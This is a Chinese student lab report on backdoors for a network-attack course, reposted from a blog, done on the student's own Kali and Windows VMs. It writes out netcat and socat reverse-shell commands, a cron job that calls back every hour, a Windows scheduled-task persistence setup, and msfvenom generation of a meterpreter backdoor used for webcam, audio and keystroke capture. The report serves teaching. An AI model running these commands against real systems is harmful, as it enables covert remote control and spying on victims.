码迷,mamicode.com
首页 > 其他好文 > 详细

20154307 《网络对抗技术》实验二 后门原理与实践

时间:2018-03-28 21:59:45      阅读:196      评论:0      收藏:0      [点我收藏+]

标签:创建   list   分享   技术分享   com   一个   ipconfig   添加   锁定   

20154307 《网络对抗技术》实验二 后门原理与实践

一、基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:下载盗版软件或者盗版电影的时候。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:linux的cron启动

(3)Meterpreter有哪些给你映像深刻的功能?

答:怎么说,摄屏这个太吊了,我以后要用胶布把这个摄像头堵住。
技术分享图片
(4)如何发现自己有系统有没有被安装后门?

答:杀毒软件吧,直接就把后门的程序杀了。

二、实验内容

1.使用netcat获取主机操作Shell,cron启动

(1) Win获得Linux Shell

首先,我们用 ipconfig 查看win的ip地址

技术分享图片

ncat监听本机(win)的4307端口

技术分享图片

(kali端)用nc kali的ip 端口 -e /bin/sh反弹连接win

技术分享图片

然后,在win端就能进行对linux的操作,例如,ls,或者是看ip地址,也为接下来的实验做铺垫

技术分享图片

win端ip:192.168.120.132

kali端ip:192.168.120.129

(2) Linux获得Win Shell

(kali端)敲入nc -l -p 端口号打开监听

然后(win端)敲入c:\your_nc_dir>ncat.exe -e cmd.exe linux的ip 端口号,对linux端进行反弹连接

技术分享图片

(kali端)输入win的操作即可对win主机进行攻击

技术分享图片

(3)使用nc传输数据

win下监听端口4307

技术分享图片

(kali端)输入nc linux的ip 端口号,连接win的端口

效果如下:

技术分享图片

技术分享图片

2.使用socat获取主机操作Shell, 任务计划启动

在win下监听4307的端口

技术分享图片

回到linux端,通过crontab -e,选3,进入vim编辑界面,进入插入模式,在最后一行敲入36 * * * * /bin/netcat 192.168.120.132 4307 -e /bin/sh,即在每个点的36分反弹连接win的4307端口,当时正好是34分,所以我输入了36,可以很快看到结果。修改后存盘退出

技术分享图片

在win端输入linux的命令,一开始命令不会马上出来,到了你设置的时间点以后,命令和执行结果都会马上出来。

效果如下:

技术分享图片

3.使用MSF meterpreter 生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

刚开始用socat时,这是啥?做完实验后,哇这个好叼

在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:

技术分享图片

在操作->程序或脚本中选择socat.exe文件的路径,在添加参数一栏填写tcp-listen:端口号 exec:cmd.exe,pty,stderr

技术分享图片

设置完成后,锁定win用户(win+L),然后进入win,这时该触发器是运行的

在kali下输入socat - tcp:win的ip:端口号,发现获得了cmd.shell

技术分享图片

4.使用MSF meterpreter 生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

kali端输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip LPORT=端口号 -f exe > 20154307_backdoor.exe,生成后门程序。(注意此时应该管理win的杀毒软件防火墙等)

技术分享图片

在win端和linux端分别输入

Win7:ncat.exe -l > 20154307_backdoor.exe

kali:nc win的ip 端口号 < 20154307_backdoor.exe

技术分享图片

技术分享图片

在Kali上使用msfconsole指令进入控制台,使用监听模块,设置payload,设置反弹回连的IP和端口

技术分享图片

设置完成后,执行监听,打开win上的后门,linux上显示攻击成功

技术分享图片

以下是攻击结果

技术分享图片

技术分享图片

技术分享图片

如此一来,课堂上讲完的实验就做完了

实验小结

这次的实验非常有意思,让我也体验了一把当黑客的感觉,后们的攻击实在太厉害了,在学习后门攻击的同时我们也应该学会防范这些攻击,保护好个人隐私,同时,平时用不到的端口该关闭也要关闭,下载软件、电影、音乐的时候还是通过正规渠道比较好,不然黑客下一个攻击的就是你

20154307 《网络对抗技术》实验二 后门原理与实践

标签:创建   list   分享   技术分享   com   一个   ipconfig   添加   锁定   

原文地址:https://www.cnblogs.com/gnlm/p/8666267.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!